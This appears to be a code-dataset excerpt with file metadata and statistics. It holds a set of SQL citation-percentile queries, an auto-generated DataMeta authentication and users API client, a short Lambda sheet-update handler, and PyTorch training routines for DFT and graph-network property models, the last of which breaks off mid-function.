|
georgetown-cset/ai-definitions-for-policymaking
|
667e928c8bb30f6e02696ac71081c6bae4096f50
|
[
"ADSL"
] | 1
|
2020-06-24T20:45:03.000Z
|
2020-06-24T20:45:03.000Z
|
tests/test_ntiles.py
|
georgetown-cset/ai-definitions-for-policymaking
|
667e928c8bb30f6e02696ac71081c6bae4096f50
|
[
"ADSL"
] | null | null | null |
tests/test_ntiles.py
|
georgetown-cset/ai-definitions-for-policymaking
|
667e928c8bb30f6e02696ac71081c6bae4096f50
|
[
"ADSL"
] | null | null | null |
from settings import DATASET
ntile_sql = f"""\
select
year,
citation_percentile,
min(times_cited) min_times_cited,
max(times_cited) max_times_cited,
count(*) as count
from {DATASET}.comparison
group by 1, 2
order by 1, 2
"""
ntile_sql_alt = f"""\
select year,
scibert_percentile,
min(times_cited) min_times_cited,
max(times_cited) max_times_cited,
round(avg(times_cited), 4) avg_times_cited,
sum(cast(times_cited > 0 as int64)) nonzero_cite_count,
count(scibert_percentile) count
from (select cset_id,
year,
times_cited,
if(scibert_hit is true,
ntile(100) over (partition by year, scibert_hit order by times_cited asc),
null) as scibert_percentile
from {DATASET}.comparison
) t
group by 1, 2
order by 1, 2
"""
ntile_sql_alt2 = f"""\
select year,
scibert_percentile,
min(times_cited) min_times_cited,
max(times_cited) max_times_cited,
round(avg(times_cited), 4) avg_times_cited,
sum(cast(times_cited > 0 as int64)) nonzero_cite_count,
count(scibert_percentile) count
from (
select comparison.cset_id,
comparison.year,
comparison.times_cited,
ntile(100) over (partition by year order by times_cited asc) as scibert_percentile
from {DATASET}.comparison
where scibert_hit is true
) t
group by 1, 2
order by 1, 2
"""
ntile_sql_alt3 = f"""\
select scibert_percentile,
min(times_cited) min_times_cited,
max(times_cited) max_times_cited,
round(avg(times_cited), 4) avg_times_cited,
sum(cast(times_cited > 0 as int64)) nonzero_cite_count,
count(scibert_percentile) as count
from (select cset_id,
scibert_hit,
times_cited,
ntile(100) over (order by times_cited asc) as scibert_percentile
from {DATASET}.comparison
where scibert_hit is true
) t
where scibert_hit is true
group by 1
order by 1
"""
ntile_sql_alt4 = f"""\
select year,
scibert_percentile,
min(times_cited) min_times_cited,
max(times_cited) max_times_cited,
round(avg(times_cited), 4) avg_times_cited,
sum(if(times_cited > 0, 1, null)) nonzero_cite_count,
count(scibert_percentile) as count
from {DATASET}.comparison
where scibert_hit is true
group by 1, 2
order by 1, 2
"""
| 33.563218
| 102
| 0.548288
| 343
| 2,920
| 4.402332
| 0.145773
| 0.251656
| 0.086093
| 0.119205
| 0.861589
| 0.796689
| 0.734437
| 0.734437
| 0.678146
| 0.638411
| 0
| 0.025014
| 0.383904
| 2,920
| 86
| 103
| 33.953488
| 0.814341
| 0
| 0
| 0.716049
| 0
| 0
| 0.947603
| 0.07363
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.012346
| 0
| 0.012346
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
5aeb0fc0c64be96b78bb154bc60ae24a36feb09a
| 27,815
|
py
|
Python
|
datameta_client_lib/api/authentication_and_users_api.py
|
ghga-de/datameta-client-lib
|
85c8900c26d092a929db6c5b0bd6b89cdea9a176
|
[
"Apache-2.0"
] | null | null | null |
datameta_client_lib/api/authentication_and_users_api.py
|
ghga-de/datameta-client-lib
|
85c8900c26d092a929db6c5b0bd6b89cdea9a176
|
[
"Apache-2.0"
] | 1
|
2021-03-15T18:42:36.000Z
|
2021-03-15T18:42:36.000Z
|
datameta_client_lib/api/authentication_and_users_api.py
|
ghga-de/datameta-client-lib
|
85c8900c26d092a929db6c5b0bd6b89cdea9a176
|
[
"Apache-2.0"
] | null | null | null |
"""
DataMeta
DataMeta # noqa: E501
The version of the OpenAPI document: 1.4.0
Contact: leon.kuchenbecker@uni-tuebingen.de
Generated by: https://openapi-generator.tech
"""
import re # noqa: F401
import sys # noqa: F401
from datameta_client_lib.api_client import ApiClient, Endpoint as _Endpoint
from datameta_client_lib.model_utils import ( # noqa: F401
check_allowed_values,
check_validations,
date,
datetime,
file_type,
none_type,
validate_and_convert_types
)
from datameta_client_lib.model.api_key_list import ApiKeyList
from datameta_client_lib.model.create_token_request import CreateTokenRequest
from datameta_client_lib.model.error_model import ErrorModel
from datameta_client_lib.model.password_change import PasswordChange
from datameta_client_lib.model.user_response import UserResponse
from datameta_client_lib.model.user_session import UserSession
from datameta_client_lib.model.user_update_request import UserUpdateRequest
class AuthenticationAndUsersApi(object):
"""NOTE: This class is auto generated by OpenAPI Generator
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def __create_api_key(
self,
**kwargs
):
"""Create new API Key/Token # noqa: E501
Create new API Key/Token # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_api_key(async_req=True)
>>> result = thread.get()
Keyword Args:
create_token_request (CreateTokenRequest): Credentials to use (optional when using cookie sessions), a label for the ApiKey to be created and the date it expires.. [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
UserSession
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
return self.call_with_http_info(**kwargs)
self.create_api_key = _Endpoint(
settings={
'response_type': (UserSession,),
'auth': [
'bearerAuth',
'cookieAuth'
],
'endpoint_path': '/keys',
'operation_id': 'create_api_key',
'http_method': 'POST',
'servers': None,
},
params_map={
'all': [
'create_token_request',
],
'required': [],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'create_token_request':
(CreateTokenRequest,),
},
'attribute_map': {
},
'location_map': {
'create_token_request': 'body',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json'
]
},
api_client=api_client,
callable=__create_api_key
)
def __delete_api_key(
self,
id,
**kwargs
):
"""Delete ApiKey by label # noqa: E501
Delete ApiKey by label. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_api_key(id, async_req=True)
>>> result = thread.get()
Args:
id (str): ID (not label) of Apikey
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
None
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['id'] = \
id
return self.call_with_http_info(**kwargs)
self.delete_api_key = _Endpoint(
settings={
'response_type': None,
'auth': [
'bearerAuth',
'cookieAuth'
],
'endpoint_path': '/keys/{id}',
'operation_id': 'delete_api_key',
'http_method': 'DELETE',
'servers': None,
},
params_map={
'all': [
'id',
],
'required': [
'id',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'id':
(str,),
},
'attribute_map': {
'id': 'id',
},
'location_map': {
'id': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client,
callable=__delete_api_key
)
def __get_user_api_keys(
self,
id,
**kwargs
):
"""All API keys for a user # noqa: E501
Get a list of all API keys for a user. Please note that you cannot retrieve the tokens themselves because they are stored in a hashed format in our database as only the respective user is allowed to know them. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_user_api_keys(id, async_req=True)
>>> result = thread.get()
Args:
id (str): ID of the User
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
ApiKeyList
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['id'] = \
id
return self.call_with_http_info(**kwargs)
self.get_user_api_keys = _Endpoint(
settings={
'response_type': (ApiKeyList,),
'auth': [
'bearerAuth',
'cookieAuth'
],
'endpoint_path': '/users/{id}/keys',
'operation_id': 'get_user_api_keys',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'id',
],
'required': [
'id',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'id':
(str,),
},
'attribute_map': {
'id': 'id',
},
'location_map': {
'id': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client,
callable=__get_user_api_keys
)
def __set_user_password(
self,
id,
**kwargs
):
"""Update a user's password # noqa: E501
Update a user's password. The user ID can be specified either as a UUID or as a site ID. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.set_user_password(id, async_req=True)
>>> result = thread.get()
Args:
id (str): User ID, either as UUID or as site ID. '0' for password reset token based access.
Keyword Args:
password_change (PasswordChange): Old and new password. [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
None
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['id'] = \
id
return self.call_with_http_info(**kwargs)
self.set_user_password = _Endpoint(
settings={
'response_type': None,
'auth': [
'bearerAuth',
'cookieAuth'
],
'endpoint_path': '/users/{id}/password',
'operation_id': 'set_user_password',
'http_method': 'PUT',
'servers': None,
},
params_map={
'all': [
'id',
'password_change',
],
'required': [
'id',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'id':
(str,),
'password_change':
(PasswordChange,),
},
'attribute_map': {
'id': 'id',
},
'location_map': {
'id': 'path',
'password_change': 'body',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json'
]
},
api_client=api_client,
callable=__set_user_password
)
def __user_information_request(
self,
id,
**kwargs
):
"""Get user information # noqa: E501
Get information about a user. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.user_information_request(id, async_req=True)
>>> result = thread.get()
Args:
id (str): ID of the user
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
UserResponse
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['id'] = \
id
return self.call_with_http_info(**kwargs)
self.user_information_request = _Endpoint(
settings={
'response_type': (UserResponse,),
'auth': [
'bearerAuth',
'cookieAuth'
],
'endpoint_path': '/users/{id}',
'operation_id': 'user_information_request',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'id',
],
'required': [
'id',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'id':
(str,),
},
'attribute_map': {
'id': 'id',
},
'location_map': {
'id': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client,
callable=__user_information_request
)
def __user_update_request(
self,
id,
**kwargs
):
"""Update a user's credentials and status # noqa: E501
Update a user's name, group, admin status and enabled status. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.user_update_request(id, async_req=True)
>>> result = thread.get()
Args:
id (str): User ID
Keyword Args:
user_update_request (UserUpdateRequest): username, group, admin status and enabled status. [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
None
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['id'] = \
id
return self.call_with_http_info(**kwargs)
self.user_update_request = _Endpoint(
settings={
'response_type': None,
'auth': [
'bearerAuth',
'cookieAuth'
],
'endpoint_path': '/users/{id}',
'operation_id': 'user_update_request',
'http_method': 'PUT',
'servers': None,
},
params_map={
'all': [
'id',
'user_update_request',
],
'required': [
'id',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'id':
(str,),
'user_update_request':
(UserUpdateRequest,),
},
'attribute_map': {
'id': 'id',
},
'location_map': {
'id': 'path',
'user_update_request': 'body',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json'
]
},
api_client=api_client,
callable=__user_update_request
)
| 35.936693
| 235
| 0.460471
| 2,440
| 27,815
| 5.005328
| 0.097541
| 0.031688
| 0.025547
| 0.026529
| 0.819209
| 0.801932
| 0.76959
| 0.758208
| 0.749857
| 0.743634
| 0
| 0.003859
| 0.459644
| 27,815
| 773
| 236
| 35.983182
| 0.808716
| 0.342549
| 0
| 0.646484
| 1
| 0
| 0.2018
| 0.026059
| 0
| 0
| 0
| 0
| 0
| 1
| 0.013672
| false
| 0.019531
| 0.021484
| 0
| 0.048828
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
518b87bd67d6ba5c51d13965719ff8db2dd83341
| 125
|
py
|
Python
|
backend/lambda_functions/update-sheets/lambda_function.py
|
MynorXico/react-crud
|
7d3691c11acdb49c19dbba2faae4f2a393645de5
|
[
"MIT"
] | null | null | null |
backend/lambda_functions/update-sheets/lambda_function.py
|
MynorXico/react-crud
|
7d3691c11acdb49c19dbba2faae4f2a393645de5
|
[
"MIT"
] | null | null | null |
backend/lambda_functions/update-sheets/lambda_function.py
|
MynorXico/react-crud
|
7d3691c11acdb49c19dbba2faae4f2a393645de5
|
[
"MIT"
] | null | null | null |
from dynamodb.handlers import sheet_handler
def lambda_handler(event, context):
return sheet_handler.update(event)
| 25
| 43
| 0.784
| 16
| 125
| 5.9375
| 0.75
| 0.252632
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.152
| 125
| 5
| 44
| 25
| 0.896226
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
519898103b5858c213f21668665e6f1da246cead
| 20,931
|
py
|
Python
|
model/train.py
|
jeah-z/BDE-FGCN-DFT
|
5542544079642a371f08c8c1f356fa235d895194
|
[
"MIT"
] | null | null | null |
model/train.py
|
jeah-z/BDE-FGCN-DFT
|
5542544079642a371f08c8c1f356fa235d895194
|
[
"MIT"
] | null | null | null |
model/train.py
|
jeah-z/BDE-FGCN-DFT
|
5542544079642a371f08c8c1f356fa235d895194
|
[
"MIT"
] | null | null | null |
# -*- coding:utf-8 -*-
"""training code
"""
import numpy as np
import pandas as pd
import argparse
import torch as th
import torch.nn as nn
import os
from torch.utils.data import DataLoader
from dft import DftModel
def train_dft(model="nmr", epochs=80, device=th.device("cpu"), args=''):
print("start")
train_file = args.train_file
valid_file = args.valid_file
test_file = args.test_file
save = args.save
# train_dir = "./"
# train_file = dataset+"_train.csv"
if model == 'nmr':
from Alchemy_dataset_nmr import TencentAlchemyDataset, batcher
# from sch_nmr import SchNetModel
elif model == 'bde':
from Alchemy_dataset_bde import TencentAlchemyDataset, batcher
# from sch_bde import SchNetModel
elif model == 'literature':
from Alchemy_dataset_litr import TencentAlchemyDataset, batcher
# from sch_litr import SchNetModel
alchemy_dataset = TencentAlchemyDataset()
alchemy_dataset.mode = "Train"
alchemy_dataset.transform = None
alchemy_dataset.file_path = train_file
alchemy_dataset._load()
valid_dataset = TencentAlchemyDataset()
# valid_dir = train_dir
# valid_file = dataset+"_valid.csv"
valid_dataset.mode = "Train"
valid_dataset.transform = None
valid_dataset.file_path = valid_file
valid_dataset._load()
test_dataset = TencentAlchemyDataset()
# test_dir = train_dir
# test_file = dataset+"_valid.csv"
test_dataset.mode = "Train"
test_dataset.transform = None
test_dataset.file_path = test_file
test_dataset._load()
alchemy_loader = DataLoader(
dataset=alchemy_dataset,
batch_size=20,
collate_fn=batcher(),
shuffle=True,
num_workers=0,
)
valid_loader = DataLoader(
dataset=valid_dataset,
batch_size=20,
collate_fn=batcher(),
shuffle=False,
num_workers=0,
)
test_loader = DataLoader(
dataset=test_dataset,
batch_size=20,
collate_fn=batcher(),
shuffle=False,
num_workers=0,
)
dft_model = DftModel(poly_order=5)
print(model)
# if model.name in ["MGCN", "SchNet"]:
# model.set_mean_std(alchemy_dataset.mean, alchemy_dataset.std, device)
dft_model.to(device)
# print("test_dataset.mean= %s" % (alchemy_dataset.mean))
# print("test_dataset.std= %s" % (alchemy_dataset.std))
loss_fn = nn.MSELoss()
MAE_fn = nn.L1Loss()
dft_optimizer = th.optim.Adam(
dft_model.parameters(), lr=0.001, weight_decay=0.000001)
# scheduler = th.optim.lr_scheduler.StepLR(optimizer, 30, gamma=0.9, eta_min=0.0001, last_epoch=-1)
scheduler = th.optim.lr_scheduler.ReduceLROnPlateau(
dft_optimizer, mode='min', factor=0.9, patience=10, threshold=0.0000001, threshold_mode='rel', cooldown=0, min_lr=0.000001, eps=1e-08, verbose=False)
log = open(save + '/train_log.txt', 'w')
def print_res(label, res, op):
size = len(res)
for i in range(size):
line = "%s,%s\n" % (label[i][0], res[i])
op.writelines(line)
def eval_dft(model, epoch, data_loader, eval_mode, log):
val_loss, val_mae = 0, 0
for jdx, batch in enumerate(data_loader):
batch.graph.to(device)
batch.label = batch.label.to(device)
batch.graph0 = batch.graph0.to(device)
batch.graph1 = batch.graph1.to(device)
batch.graph2 = batch.graph2.to(device)
batch.graph3 = batch.graph3.to(device)
batch.graph4 = batch.graph4.to(device)
batch.graph5 = batch.graph5.to(device)
batch.graph6 = batch.graph6.to(device)
batch.graph7 = batch.graph7.to(device)
batch.feature = batch.feature.to(device)
batch.dft = batch.dft.to(device)
res_dft = dft_model(batch.dft)
# new_dft = dft_model.make_features(batch.dft)
# res_dft = new_dft.mul(w_dft)
# res_dft = res_dft.sum(1)
# res_dft = res_dft.unsqueeze(1)
l = batch.label.cpu().detach().numpy()
r = res_dft.cpu().detach().numpy()
loss = loss_fn(res_dft, batch.label)
mae = MAE_fn(res_dft, batch.label)
val_mae += mae.detach().item()
val_loss += loss.detach().item()
val_mae /= jdx + 1
val_loss /= jdx + 1
print(
f"Epoch {epoch} {eval_mode}_loss: {round(val_loss,4)}, {eval_mode}_mae: {round(val_mae,4)}")
log.write(
f"Epoch {epoch} {eval_mode}_loss: {round(val_loss,4)}, {eval_mode}_mae: {round(val_mae,4)}\n")
if epoch % args.saveFreq == 0:
# op_file = open('save/'+str(epoch)+'re')
res_op = open(f'{save}/{eval_mode}_res_{epoch}.csv', 'w')
for jdx, batch in enumerate(data_loader):
batch.graph.to(device)
batch.label = batch.label.to(device)
batch.graph0 = batch.graph0.to(device)
batch.graph1 = batch.graph1.to(device)
batch.graph2 = batch.graph2.to(device)
batch.graph3 = batch.graph3.to(device)
batch.graph4 = batch.graph4.to(device)
batch.graph5 = batch.graph5.to(device)
batch.graph6 = batch.graph6.to(device)
batch.graph7 = batch.graph7.to(device)
batch.feature = batch.feature.to(device)
batch.dft = batch.dft.to(device)
res_dft = dft_model(batch.dft)
# new_dft = dft_model.make_features(batch.dft)
# res_dft = new_dft.mul(w_dft)
# res_dft = res_dft.sum(1)
# res_dft = res_dft.unsqueeze(1)
# res = model(batch.graph, batch.graph0, batch.graph1, batch.graph2, batch.graph3, batch.graph4, batch.graph5, batch.graph6, batch.graph7,
# batch.feature)
l = batch.label.cpu().detach().numpy()
r = res_dft.cpu().detach().numpy()
print_res(l, r, res_op)
res_op.close()
for epoch in range(epochs):
w_loss, w_mae = 0, 0
dft_model.train()
for idx, batch in enumerate(alchemy_loader):
batch.graph.to(device)
batch.label = batch.label.to(device)
batch.graph0 = batch.graph0.to(device)
batch.graph1 = batch.graph1.to(device)
batch.graph2 = batch.graph2.to(device)
batch.graph3 = batch.graph3.to(device)
batch.graph4 = batch.graph4.to(device)
batch.graph5 = batch.graph5.to(device)
batch.graph6 = batch.graph6.to(device)
batch.graph7 = batch.graph7.to(device)
batch.feature = batch.feature.to(device)
batch.dft = batch.dft.to(device)
# print(f'batch.dft={batch.dft}')
res_dft = dft_model(batch.dft)
# print(f'res_dft={res_dft}')
# print(f'batch.label={batch.label}')
# new_dft = dft_model.make_features(batch.dft)
# res_dft = new_dft.mul(w_dft)
# res_dft = res_dft.sum(1)
# res_dft = res_dft.unsqueeze(1)
# res = model(batch.graph, batch.graph0, batch.graph1, batch.graph2, batch.graph3, batch.graph4, batch.graph5, batch.graph6, batch.graph7,
# batch.feature)
# print(f"res_dft= {res_dft}")
# print(f"label= {batch.label}")
dft_loss = loss_fn(res_dft, batch.label)
# print(f"batch_label: {batch.label}")
mae = MAE_fn(res_dft, batch.label)
dft_optimizer.zero_grad()
dft_loss.backward()
dft_optimizer.step()
w_mae += mae.detach().item()
w_loss += dft_loss.detach().item()
w_mae /= idx + 1
w_loss /= idx + 1
scheduler.step(w_mae)
print("Epoch {:2d}, loss: {:.7f}, mae: {:.7f}".format(
epoch, w_loss, w_mae))
log.write("Epoch {:2d}, loss: {:.7f}, mae: {:.7f} \n".format(
epoch, w_loss, w_mae))
dft_model.eval()
with th.no_grad():
if epoch % args.saveFreq == 0:
res_op = open(save+'/Train_res_'+str(epoch)+'.csv', 'w')
th.save(dft_model, save+'/dft_model_'+str(epoch))
for jdx, batch in enumerate(alchemy_loader):
batch.graph.to(device)
batch.label = batch.label.to(device)
batch.graph0 = batch.graph0.to(device)
batch.graph1 = batch.graph1.to(device)
batch.graph2 = batch.graph2.to(device)
batch.graph3 = batch.graph3.to(device)
batch.graph4 = batch.graph4.to(device)
batch.graph5 = batch.graph5.to(device)
batch.graph6 = batch.graph6.to(device)
batch.graph7 = batch.graph7.to(device)
batch.feature = batch.feature.to(device)
batch.dft = batch.dft.to(device)
res_dft = dft_model(batch.dft)
# new_dft = dft_model.make_features(batch.dft)
# res_dft = new_dft.mul(w_dft)
# res_dft = res_dft.sum(1)
# res_dft = res_dft.unsqueeze(1)
l = batch.label.cpu().detach().numpy()
r = res_dft.cpu().detach().numpy()
print_res(l, r, res_op)
res_op.close()
eval_dft(model, epoch, valid_loader, 'valid', log)
eval_dft(model, epoch, test_loader, 'test', log)
def train_gcn(model="nmr", epochs=80, device=th.device("cpu"), args=''):
print("start training gcn model!")
train_file = args.train_file
valid_file = args.valid_file
test_file = args.test_file
save = args.save
model = args.model
dft_model_name = args.dft_model
dft_model = DftModel(5)
dft_model = th.load(dft_model_name)
dft_model.to(device)
dft_model.param.requires_grad = False
print(f"{dft_model.param} in linear model has been setted as nontrainable.")
if model == 'nmr':
from Alchemy_dataset_nmr import TencentAlchemyDataset, batcher
from sch_nmr import SchNetModel
elif model == 'bde':
from Alchemy_dataset_bde import TencentAlchemyDataset, batcher
from sch_bde import SchNetModel
elif model == 'literature':
from Alchemy_dataset_litr import TencentAlchemyDataset, batcher
from sch_litr import SchNetModel
alchemy_dataset = TencentAlchemyDataset()
alchemy_dataset.mode = "Train"
alchemy_dataset.transform = None
alchemy_dataset.file_path = train_file
alchemy_dataset._load()
valid_dataset = TencentAlchemyDataset()
# valid_dir = train_dir
# valid_file = dataset+"_valid.csv"
valid_dataset.mode = "Train"
valid_dataset.transform = None
valid_dataset.file_path = valid_file
valid_dataset._load()
test_dataset = TencentAlchemyDataset()
# test_dir = train_dir
# test_file = dataset+"_valid.csv"
test_dataset.mode = "Train"
test_dataset.transform = None
test_dataset.file_path = test_file
test_dataset._load()
alchemy_loader = DataLoader(
dataset=alchemy_dataset,
batch_size=20,
collate_fn=batcher(),
shuffle=True,
num_workers=0,
)
valid_loader = DataLoader(
dataset=valid_dataset,
batch_size=20,
collate_fn=batcher(),
shuffle=False,
num_workers=0,
)
test_loader = DataLoader(
dataset=test_dataset,
batch_size=20,
collate_fn=batcher(),
shuffle=False,
num_workers=0,
)
